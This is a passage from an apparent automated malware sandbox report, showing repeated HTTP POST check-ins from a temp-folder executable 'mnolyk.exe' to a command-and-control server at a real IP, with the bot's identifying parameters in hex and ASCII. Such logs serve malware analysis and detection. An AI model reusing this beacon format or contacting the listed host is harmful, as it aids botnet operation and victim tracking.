                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:40:12.806556940 CET797INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:40:12 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            61192.168.2.44975662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:37:41.670964956 CET250OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:41.734636068 CET250INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:41 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            610192.168.2.45030562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:40:12.988862991 CET798OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:40:13.054493904 CET798INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:40:13 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            611192.168.2.45030662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:40:13.234357119 CET799OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:40:13.299527884 CET799INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:40:13 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            612192.168.2.45030762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:40:13.620719910 CET800OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:40:13.684689999 CET800INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:40:13 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            613192.168.2.45030862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:40:13.941052914 CET801OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:40:14.005723000 CET801INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:40:13 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            614192.168.2.45030962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:40:14.212817907 CET802OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:40:14.277204990 CET802INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:40:14 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            615192.168.2.45031062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:40:15.001847029 CET803OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:40:15.067188978 CET803INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:40:15 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            616192.168.2.45031162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:40:15.296989918 CET804OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:40:15.358453035 CET804INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:40:15 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            617192.168.2.45031262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:40:15.535341024 CET805OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:40:15.597728014 CET805INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:40:15 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            618192.168.2.45031362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:40:16.587697983 CET806OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:40:16.652751923 CET806INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:40:16 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            619192.168.2.45031462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:40:17.451507092 CET807OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:40:17.515319109 CET807INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:40:17 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            62192.168.2.44975762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:37:41.898386955 CET251OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:41.960125923 CET251INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:41 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            620192.168.2.45031562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:40:17.704524994 CET808OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:40:17.767868996 CET808INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:40:17 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            621192.168.2.45031662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:40:17.940022945 CET809OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:40:18.003640890 CET809INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:40:17 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            622192.168.2.45031762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:40:18.173072100 CET810OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:40:18.236695051 CET810INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:40:18 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            623192.168.2.45031862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:40:18.404660940 CET811OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:40:18.467207909 CET811INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:40:18 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            624192.168.2.45031962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:40:18.663429022 CET812OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:40:18.728003025 CET812INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:40:18 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            625192.168.2.45032062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:40:18.911019087 CET813OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:40:18.974771023 CET813INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:40:18 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            626192.168.2.45032162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:40:19.144640923 CET814OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:40:19.208740950 CET814INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:40:19 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            627192.168.2.45032262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:40:19.378355026 CET815OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:40:19.442337036 CET815INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:40:19 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            628192.168.2.45032362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:40:19.611217976 CET816OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
